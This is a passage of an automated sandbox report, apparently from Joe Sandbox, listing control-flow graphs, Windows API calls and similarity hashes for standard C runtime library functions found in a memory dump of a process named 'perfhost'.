                                                                                                                                                                                control_flow_graph 11355 701a8f-701aa3 11356 701b11-701b19 11355->11356 11357 701aa5-701aaa 11355->11357 11358 701b60-701b78 call 701c02 11356->11358 11359 701b1b-701b1e 11356->11359 11357->11356 11360 701aac-701ab1 11357->11360 11367 701b7b-701b82 11358->11367 11359->11358 11363 701b20-701b5d call 701626 * 4 11359->11363 11360->11356 11362 701ab3-701ab6 11360->11362 11362->11356 11365 701ab8-701ac0 11362->11365 11363->11358 11368 701ac2-701ac5 11365->11368 11369 701ada-701ae2 11365->11369 11371 701ba1-701ba5 11367->11371 11372 701b84-701b88 11367->11372 11368->11369 11373 701ac7-701ad9 call 701626 call 702603 11368->11373 11374 701ae4-701ae7 11369->11374 11375 701afc-701b10 call 701626 * 2 11369->11375 11383 701ba7-701bac 11371->11383 11384 701bbd-701bc9 11371->11384 11378 701b8a-701b8d 11372->11378 11379 701b9e 11372->11379 11373->11369 11374->11375 11381 701ae9-701afb call 701626 call 702701 11374->11381 11375->11356 11378->11379 11387 701b8f-701b9d call 701626 * 2 11378->11387 11379->11371 11381->11375 11391 701bba 11383->11391 11392 701bae-701bb1 11383->11392 11384->11367 11386 701bcb-701bd8 call 701626 11384->11386 11387->11379 11391->11384 11392->11391 11399 701bb3-701bb9 call 701626 11392->11399 11399->11391
                                                                                                                                                                                APIs
                                                                                                                                                                                • ___free_lconv_mon.LIBCMT ref: 00701AD3
                                                                                                                                                                                  • Part of subcall function 00702603: _free.LIBCMT ref: 00702620
                                                                                                                                                                                  • Part of subcall function 00702603: _free.LIBCMT ref: 00702632
                                                                                                                                                                                  • Part of subcall function 00702603: _free.LIBCMT ref: 00702644
                                                                                                                                                                                  • Part of subcall function 00702603: _free.LIBCMT ref: 00702656
                                                                                                                                                                                  • Part of subcall function 00702603: _free.LIBCMT ref: 00702668
                                                                                                                                                                                  • Part of subcall function 00702603: _free.LIBCMT ref: 0070267A
                                                                                                                                                                                  • Part of subcall function 00702603: _free.LIBCMT ref: 0070268C
                                                                                                                                                                                  • Part of subcall function 00702603: _free.LIBCMT ref: 0070269E
                                                                                                                                                                                  • Part of subcall function 00702603: _free.LIBCMT ref: 007026B0
                                                                                                                                                                                  • Part of subcall function 00702603: _free.LIBCMT ref: 007026C2
                                                                                                                                                                                  • Part of subcall function 00702603: _free.LIBCMT ref: 007026D4
                                                                                                                                                                                  • Part of subcall function 00702603: _free.LIBCMT ref: 007026E6
                                                                                                                                                                                  • Part of subcall function 00702603: _free.LIBCMT ref: 007026F8
                                                                                                                                                                                • _free.LIBCMT ref: 00701AC8
                                                                                                                                                                                  • Part of subcall function 00701626: HeapFree.KERNEL32(00000000,00000000,?,00702798,?,00000000,?,00000000,?,007027BF,?,00000007,?,?,00701C27,?), ref: 0070163C
                                                                                                                                                                                  • Part of subcall function 00701626: GetLastError.KERNEL32(?,?,00702798,?,00000000,?,00000000,?,007027BF,?,00000007,?,?,00701C27,?,?), ref: 0070164E
                                                                                                                                                                                • _free.LIBCMT ref: 00701AEA
                                                                                                                                                                                • _free.LIBCMT ref: 00701AFF
                                                                                                                                                                                • _free.LIBCMT ref: 00701B0A
                                                                                                                                                                                • _free.LIBCMT ref: 00701B2C
                                                                                                                                                                                • _free.LIBCMT ref: 00701B3F
                                                                                                                                                                                • _free.LIBCMT ref: 00701B4D
                                                                                                                                                                                • _free.LIBCMT ref: 00701B58
                                                                                                                                                                                • _free.LIBCMT ref: 00701B90
                                                                                                                                                                                • _free.LIBCMT ref: 00701B97
                                                                                                                                                                                • _free.LIBCMT ref: 00701BB4
                                                                                                                                                                                • _free.LIBCMT ref: 00701BCC
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000F.00000002.3340574927.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006C0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_15_2_6c0000_perfhost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 161543041-0
                                                                                                                                                                                • Opcode ID: e239a9b793807ac3236a94112f4cb51a7581a8b6ff01ff37a56798222b109b29
                                                                                                                                                                                • Instruction ID: f4ea28945e3863bbf4f0f9cc59470ab172f2312298e2a8fd6d3ea900b3141762
                                                                                                                                                                                • Opcode Fuzzy Hash: e239a9b793807ac3236a94112f4cb51a7581a8b6ff01ff37a56798222b109b29
                                                                                                                                                                                • Instruction Fuzzy Hash: B7317E71A00604DFEB30AA39DC49B5673E9EF00350F944669E849D72D1EF79EC808765
                                                                                                                                                                                Function 00700FAB Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 11412 700fab-700fc6 11413 700fd8 11412->11413 11414 700fc8-700fd6 RtlDecodePointer 11412->11414 11415 700fdd-700fe3 11413->11415 11414->11415 11416 700fe9 11415->11416 11417 70110a-70110d 11415->11417 11418 7010fe 11416->11418 11419 700fef-700ff2 11416->11419 11420 70116a 11417->11420 11421 70110f-701112 11417->11421 11427 701100-701105 11418->11427 11422 700ff8 11419->11422 11423 70109f-7010a2 11419->11423 11424 701171 11420->11424 11425 701114-701117 11421->11425 11426 70115e 11421->11426 11429 70108c-70109a 11422->11429 11430 700ffe-701003 11422->11430 11434 7010a4-7010a7 11423->11434 11435 7010f5-7010fc 11423->11435 11431 701178-7011a1 11424->11431 11432 701152 11425->11432 11433 701119-70111c 11425->11433 11426->11420 11428 7011b3-7011c2 call 70419d 11427->11428 11429->11431 11436 701005-701008 11430->11436 11437 70107d-701087 11430->11437 11459 7011a3-7011a8 call 700b63 11431->11459 11460 7011ae-7011b1 11431->11460 11432->11426 11438 701146 11433->11438 11439 70111e-701121 11433->11439 11440 7010a9-7010ac 11434->11440 11441 7010ec-7010f3 11434->11441 11443 7010b9-7010e7 11435->11443 11444 701074-70107b 11436->11444 11445 70100a-70100d 11436->11445 11437->11431 11438->11432 11447 701123-701128 11439->11447 11448 70113a 11439->11448 11440->11428 11449 7010b2 11440->11449 11441->11424 11443->11460 11451 70101f-70104f 11444->11451 11452 701065-70106f 11445->11452 11453 70100f-701012 11445->11453 11454 701133-701138 11447->11454 11455 70112a-70112d 11447->11455 11448->11438 11449->11443 11451->11460 11466 701055-701060 call 700b63 11451->11466 11452->11431 11453->11428 11457 701018 11453->11457 11454->11427 11455->11428 11455->11454 11457->11451 11459->11460 11460->11428 11466->11460
                                                                                                                                                                                APIs
                                                                                                                                                                                • RtlDecodePointer.NTDLL(00000000), ref: 00700FCE
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000F.00000002.3340574927.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006C0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_15_2_6c0000_perfhost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DecodePointer
                                                                                                                                                                                • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                                                                                                                • API String ID: 3527080286-3064271455
                                                                                                                                                                                • Opcode ID: 31b3c9044e4a82b2d6038b9b80e40f31490b22391a62fc0a7eb9acff41e9bda7
                                                                                                                                                                                • Instruction ID: 50a80c6691e01fc82a70e931f459afbe231f3fd3177bbe57ee1233e17aa95b80
                                                                                                                                                                                • Opcode Fuzzy Hash: 31b3c9044e4a82b2d6038b9b80e40f31490b22391a62fc0a7eb9acff41e9bda7
                                                                                                                                                                                • Instruction Fuzzy Hash: 4C515B7090010EEBDB14DF68E9481ECBBF1FF49304FA14395D681A72E5CB7D8AA49B14
                                                                                                                                                                                Function 0070712C Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 11469 70712c-707189 GetConsoleCP 11470 7072cc-7072de call 70419d 11469->11470 11471 70718f-7071ab 11469->11471 11472 7071c6-7071d7 call 7025dd 11471->11472 11473 7071ad-7071c4 11471->11473 11480 7071d9-7071dc 11472->11480 11481 7071fd-7071ff 11472->11481 11475 707200-70720f call 706ec7 11473->11475 11475->11470 11485 707215-707235 WideCharToMultiByte 11475->11485 11483 7071e2-7071f4 call 706ec7 11480->11483 11484 7072a3-7072c2 11480->11484 11481->11475 11483->11470 11492 7071fa-7071fb 11483->11492 11484->11470 11485->11470 11486 70723b-707251 WriteFile 11485->11486 11488 707253-707264 11486->11488 11489 7072c4-7072ca GetLastError 11486->11489 11488->11470 11491 707266-70726a 11488->11491 11489->11470 11493 707298-70729b 11491->11493 11494 70726c-70728a WriteFile 11491->11494 11492->11485 11493->11471 11496 7072a1 11493->11496 11494->11489 11495 70728c-707290 11494->11495 11495->11470 11497 707292-707295 11495->11497 11496->11470 11497->11493
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,007078A1,?,00000000,?,00000000,00000000), ref: 0070716E
                                                                                                                                                                                • __fassign.LIBCMT ref: 007071E9
                                                                                                                                                                                • __fassign.LIBCMT ref: 00707204
                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 0070722A
                                                                                                                                                                                • WriteFile.KERNEL32(?,?,00000000,007078A1,00000000,?,?,?,?,?,?,?,?,?,007078A1,?), ref: 00707249
                                                                                                                                                                                • WriteFile.KERNEL32(?,?,00000001,007078A1,00000000,?,?,?,?,?,?,?,?,?,007078A1,?), ref: 00707282
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000F.00000002.3340574927.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006C0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_15_2_6c0000_perfhost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1324828854-0
                                                                                                                                                                                • Opcode ID: 2fbec39e783b4a06a99a0c673f6040d72ea02567266b888c178b8c4a62f4362b
                                                                                                                                                                                • Instruction ID: 0ec3a970fffc001d7c77fd802f354f360b366b9c3e253118de3f710b574350e8
                                                                                                                                                                                • Opcode Fuzzy Hash: 2fbec39e783b4a06a99a0c673f6040d72ea02567266b888c178b8c4a62f4362b
                                                                                                                                                                                • Instruction Fuzzy Hash: DD519D71E04249EFCB14CFA8DC45AEEBBF8BF19300F14425AE955E72D2E634A941CB64
                                                                                                                                                                                Function 007027A6 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 11498 7027a6-7027b1 11499 702887-702889 11498->11499 11500 7027b7-702884 call 70276a * 5 call 701626 * 3 call 70276a * 5 call 701626 * 4 11498->11500 11500->11499
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 0070276A: _free.LIBCMT ref: 00702793
                                                                                                                                                                                • _free.LIBCMT ref: 007027F4
                                                                                                                                                                                  • Part of subcall function 00701626: HeapFree.KERNEL32(00000000,00000000,?,00702798,?,00000000,?,00000000,?,007027BF,?,00000007,?,?,00701C27,?), ref: 0070163C
                                                                                                                                                                                  • Part of subcall function 00701626: GetLastError.KERNEL32(?,?,00702798,?,00000000,?,00000000,?,007027BF,?,00000007,?,?,00701C27,?,?), ref: 0070164E
                                                                                                                                                                                • _free.LIBCMT ref: 007027FF
                                                                                                                                                                                • _free.LIBCMT ref: 0070280A
                                                                                                                                                                                • _free.LIBCMT ref: 0070285E
                                                                                                                                                                                • _free.LIBCMT ref: 00702869
                                                                                                                                                                                • _free.LIBCMT ref: 00702874
                                                                                                                                                                                • _free.LIBCMT ref: 0070287F
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000F.00000002.3340574927.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006C0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_15_2_6c0000_perfhost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 776569668-0
                                                                                                                                                                                • Opcode ID: fcd263e1e97f9626aa0bdc167c26919d6134e182e28646451650430cd4015995
                                                                                                                                                                                • Instruction ID: a98b9fdd6f1a3fe15189e2cc01fc39fb8b3f231800eb1cdab56cad6c79653c27
                                                                                                                                                                                • Opcode Fuzzy Hash: fcd263e1e97f9626aa0bdc167c26919d6134e182e28646451650430cd4015995
                                                                                                                                                                                • Instruction Fuzzy Hash: 88110A73940B04EAD630BBB0CE4FFCB77DCAF04700F845A15BA9AB60D3DA69A9058755
                                                                                                                                                                                Function 00703A79 Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 11994 703a79-703a92 11995 703a94-703aa4 call 703f8c 11994->11995 11996 703aa8-703aad 11994->11996 11995->11996 12006 703aa6 11995->12006 11997 703aba-703ade MultiByteToWideChar 11996->11997 11998 703aaf-703ab7 11996->11998 12000 703c71-703c84 call 70419d 11997->12000 12001 703ae4-703af0 11997->12001 11998->11997 12003 703af2-703b03 12001->12003 12004 703b44 12001->12004 12007 703b22-703b33 call 70288a 12003->12007 12008 703b05-703b14 call 704330 12003->12008 12010 703b46-703b48 12004->12010 12006->11996 12011 703c66 12007->12011 12022 703b39 12007->12022 12008->12011 12021 703b1a-703b20 12008->12021 12010->12011 12012 703b4e-703b61 MultiByteToWideChar 12010->12012 12016 703c68-703c6f call 702bac 12011->12016 12012->12011 12015 703b67-703b82 call 7018a7 12012->12015 12015->12011 12026 703b88-703b8f 12015->12026 12016->12000 12025 703b3f-703b42 12021->12025 12022->12025 12025->12010 12027 703b91-703b96 12026->12027 12028 703bc9-703bd5 12026->12028 12027->12016 12029 703b9c-703b9e 12027->12029 12030 703c21 12028->12030 12031 703bd7-703be8 12028->12031 12029->12011 12032 703ba4-703bbe call 7018a7 12029->12032 12033 703c23-703c25 12030->12033 12034 703c03-703c14 call 70288a 12031->12034 12035 703bea-703bf9 call 704330 12031->12035 12032->12016 12049 703bc4 12032->12049 12038 703c27-703c40 call 7018a7 12033->12038 12039 703c5f-703c65 call 702bac 12033->12039 12034->12039 12048 703c16 12034->12048 12035->12039 12047 703bfb-703c01 12035->12047 12038->12039 12052 703c42-703c49 12038->12052 12039->12011 12051 703c1c-703c1f 12047->12051 12048->12051 12049->12011 12051->12033 12053 703c85-703c8b 12052->12053 12054 703c4b-703c4c 12052->12054 12055 703c4d-703c5d WideCharToMultiByte 12053->12055 12054->12055 12055->12039 12056 703c8d-703c94 call 702bac 12055->12056 12056->12016
                                                                                                                                                                                APIs
                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,?,00000000,?,?,?,00703CCA,?,?,00000000), ref: 00703AD3
                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,00703CCA,?,?,00000000,?,?,?), ref: 00703B59
                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00703C53
                                                                                                                                                                                • __freea.LIBCMT ref: 00703C60
                                                                                                                                                                                  • Part of subcall function 0070288A: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 007028BC
                                                                                                                                                                                • __freea.LIBCMT ref: 00703C69
                                                                                                                                                                                • __freea.LIBCMT ref: 00703C8E
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000F.00000002.3340574927.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006C0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_15_2_6c0000_perfhost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1414292761-0
                                                                                                                                                                                • Opcode ID: 326ccd53df0ee620fca293b58706a839221877c12d29257857da602a7cf42670
                                                                                                                                                                                • Instruction ID: 628bff02f05d377261807aec00bd1b1dab6dba980c57455621f9d25626970c34
                                                                                                                                                                                • Opcode Fuzzy Hash: 326ccd53df0ee620fca293b58706a839221877c12d29257857da602a7cf42670
                                                                                                                                                                                • Instruction Fuzzy Hash: 7E51C1B2A00216EBEB258F64CC85EBB77EEEB40750F144729F904E61C0EB38DE50D660
                                                                                                                                                                                Function 00700DEB Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 12059 700deb-700dff GetLastError 12060 700e01-700e0b call 701796 12059->12060 12061 700e0d-700e1f call 7015c9 12059->12061 12060->12061 12066 700e56-700e61 SetLastError 12060->12066 12067 700e21 12061->12067 12068 700e2a-700e38 call 7017ec 12061->12068 12069 700e22-700e28 call 701626 12067->12069 12073 700e3a-700e3b 12068->12073 12074 700e3d-700e54 call 700d27 call 701626 12068->12074 12077 700e62-700e6e SetLastError call 701586 12069->12077 12073->12069 12074->12066 12074->12077
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000F.00000002.3340574927.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006C0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_15_2_6c0000_perfhost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3160817290-0
                                                                                                                                                                                • Opcode ID: 4abfccb8620476b2f48a931ab180507e69f38f1e6606efc5840cd607ae661d0a
                                                                                                                                                                                • Instruction ID: ff6172b76ddc7244bea1cbbce751250b097388690e6cdfbee2e27b370e5b2bb6
                                                                                                                                                                                • Opcode Fuzzy Hash: 4abfccb8620476b2f48a931ab180507e69f38f1e6606efc5840cd607ae661d0a
                                                                                                                                                                                • Instruction Fuzzy Hash: 45F0F436104A01E6D6123378EC0EB6B22D98BC1771F698B18FA04B61D2FE6D8C0141A9
                                                                                                                                                                                Function 00703552 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 12083 703552-70357a GetModuleHandleExW 12084 70357c-70358f GetProcAddress 12083->12084 12085 70359f-7035a3 12083->12085 12086 703591-70359c 12084->12086 12087 70359e 12084->12087 12088 7035a5-7035a8 FreeLibrary 12085->12088 12089 7035ae-7035bb call 70419d 12085->12089 12086->12087 12087->12085 12088->12089
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00703503,00000003,?,007034A3,00000003,0071CE80,0000000C,007035CD,00000003,00000002), ref: 00703572
                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00703585
                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,00703503,00000003,?,007034A3,00000003,0071CE80,0000000C,007035CD,00000003,00000002,00000000), ref: 007035A8
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000F.00000002.3340574927.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006C0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_15_2_6c0000_perfhost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                • API String ID: 4061214504-1276376045
                                                                                                                                                                                • Opcode ID: 33ac2dbe40461a0a904401a40643da27f18e82b75aea49aa620a784993660e80
                                                                                                                                                                                • Instruction ID: 44c022d556464a99c939bc8afd034ead413c32c4cf4505737f2ba8048e277ac8
                                                                                                                                                                                • Opcode Fuzzy Hash: 33ac2dbe40461a0a904401a40643da27f18e82b75aea49aa620a784993660e80
                                                                                                                                                                                • Instruction Fuzzy Hash: A3F03170A0021DFBCB119F65DC0AB9DBBB9EF48751F008265F905A21A0DF785A90CA54
                                                                                                                                                                                Function 00700E6F Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 12829 700e6f-700e86 GetLastError 12830 700e94-700ea6 call 7015c9 12829->12830 12831 700e88-700e92 call 701796 12829->12831 12837 700eb1-700ebf call 7017ec 12830->12837 12838 700ea8 12830->12838 12831->12830 12836 700ee5-700eec SetLastError 12831->12836 12840 700eee-700ef3 12836->12840 12844 700ec1-700ec2 12837->12844 12845 700ec4-700eda call 700d27 call 701626 12837->12845 12841 700ea9-700eaf call 701626 12838->12841 12848 700edc-700ee3 SetLastError 12841->12848 12844->12841 12845->12836 12845->12848 12848->12840
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetLastError.KERNEL32(00000008,?,?,00700B68,0070324B,?,007012BA,?,?,00000000), ref: 00700E74
                                                                                                                                                                                • _free.LIBCMT ref: 00700EA9
                                                                                                                                                                                • _free.LIBCMT ref: 00700ED0
                                                                                                                                                                                • SetLastError.KERNEL32(00000000,?,007012BA,?,?,00000000), ref: 00700EDD
                                                                                                                                                                                • SetLastError.KERNEL32(00000000,?,007012BA,?,?,00000000), ref: 00700EE6
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000F.00000002.3340574927.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006C0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_15_2_6c0000_perfhost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ErrorLast$_free
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3170660625-0
                                                                                                                                                                                • Opcode ID: fe3ca1ea104678cacff56a8d1b7c0287cb90710f3197e6fd1c885f8099b73e82
                                                                                                                                                                                • Instruction ID: de3d56eeae8d14684e0967f4f305eee5331fe653063da88ef1689b603a0b6be6
                                                                                                                                                                                • Opcode Fuzzy Hash: fe3ca1ea104678cacff56a8d1b7c0287cb90710f3197e6fd1c885f8099b73e82
                                                                                                                                                                                • Instruction Fuzzy Hash: 6A01D176200A01EBD3127678DC8DB2B22D98BC1378F694B25F904B22D2FE7D8C0541A4
                                                                                                                                                                                Function 00702701 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 12852 702701-70270c 12853 702767-702769 12852->12853 12854 70270e-702716 12852->12854 12855 702718-70271e call 701626 12854->12855 12856 70271f-702728 12854->12856 12855->12856 12858 702731-70273a 12856->12858 12859 70272a-702730 call 701626 12856->12859 12862 702743-70274c 12858->12862 12863 70273c-702742 call 701626 12858->12863 12859->12858 12866 702755-70275e 12862->12866 12867 70274e-702754 call 701626 12862->12867 12863->12862 12866->12853 12868 702760-702766 call 701626 12866->12868 12867->12866 12868->12853
                                                                                                                                                                                APIs
                                                                                                                                                                                • _free.LIBCMT ref: 00702719
                                                                                                                                                                                  • Part of subcall function 00701626: HeapFree.KERNEL32(00000000,00000000,?,00702798,?,00000000,?,00000000,?,007027BF,?,00000007,?,?,00701C27,?), ref: 0070163C
                                                                                                                                                                                  • Part of subcall function 00701626: GetLastError.KERNEL32(?,?,00702798,?,00000000,?,00000000,?,007027BF,?,00000007,?,?,00701C27,?,?), ref: 0070164E
                                                                                                                                                                                • _free.LIBCMT ref: 0070272B
                                                                                                                                                                                • _free.LIBCMT ref: 0070273D
                                                                                                                                                                                • _free.LIBCMT ref: 0070274F
                                                                                                                                                                                • _free.LIBCMT ref: 00702761
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000F.00000002.3340574927.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006C0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_15_2_6c0000_perfhost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 776569668-0
                                                                                                                                                                                • Opcode ID: 8aeb39a074a8b43ebfa4baeafdc69b77cada8e206853f1e3db516cf39910f8db
                                                                                                                                                                                • Instruction ID: dcadd6b3fcac40a7c09d66e7c7637dc17ec05fcc35178daf85b59815132cb8d8
                                                                                                                                                                                • Opcode Fuzzy Hash: 8aeb39a074a8b43ebfa4baeafdc69b77cada8e206853f1e3db516cf39910f8db
                                                                                                                                                                                • Instruction Fuzzy Hash: 1FF04F33504600EBC624EB5CEDCDC5A73D9EA04710BA8AA45F90CD76D2CB2DFC8187A9
                                                                                                                                                                                Function 00702A8F Relevance: 6.1, APIs: 4, Instructions: 110COMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 12874 702a8f-702ab4 call 6ff309 12877 702ac1-702ae7 MultiByteToWideChar 12874->12877 12878 702ab6-702abe 12874->12878 12879 702b86-702b8a 12877->12879 12880 702aed-702af9 12877->12880 12878->12877 12881 702b96-702bab call 70419d 12879->12881 12882 702b8c-702b8f 12879->12882 12883 702b45 12880->12883 12884 702afb-702b0c 12880->12884 12882->12881 12886 702b47-702b49 12883->12886 12887 702b27-702b38 call 70288a 12884->12887 12888 702b0e-702b1d call 704330 12884->12888 12891 702b4b-702b6d call 705c60 MultiByteToWideChar 12886->12891 12892 702b7f-702b85 call 702bac 12886->12892 12887->12892 12899 702b3a 12887->12899 12888->12892 12898 702b1f-702b25 12888->12898 12891->12892 12903 702b6f-702b7d GetStringTypeW 12891->12903 12892->12879 12902 702b40-702b43 12898->12902 12899->12902 12902->12886 12903->12892
                                                                                                                                                                                APIs
                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000100,?,00000000,?,?,00000000), ref: 00702ADC
                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00702B65
                                                                                                                                                                                • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00702B77
                                                                                                                                                                                • __freea.LIBCMT ref: 00702B80
                                                                                                                                                                                  • Part of subcall function 0070288A: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 007028BC
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000F.00000002.3340574927.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006C0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_15_2_6c0000_perfhost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2652629310-0
                                                                                                                                                                                • Opcode ID: fb79e699f29506167a5c0f1893a66ff1e61165bd78c280fb6507e0d312f311b3
                                                                                                                                                                                • Instruction ID: 7bb0baf5b991aafb5cdee421646c3b2ccf0f05975714b71500593ad2d221e348
                                                                                                                                                                                • Opcode Fuzzy Hash: fb79e699f29506167a5c0f1893a66ff1e61165bd78c280fb6507e0d312f311b3
                                                                                                                                                                                • Instruction Fuzzy Hash: EB3172B2A0021ADBDF25DF64DC89DAF7BE5EB40710B144269FC04D61A2EB39DD51CB90
                                                                                                                                                                                Function 0070171B Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
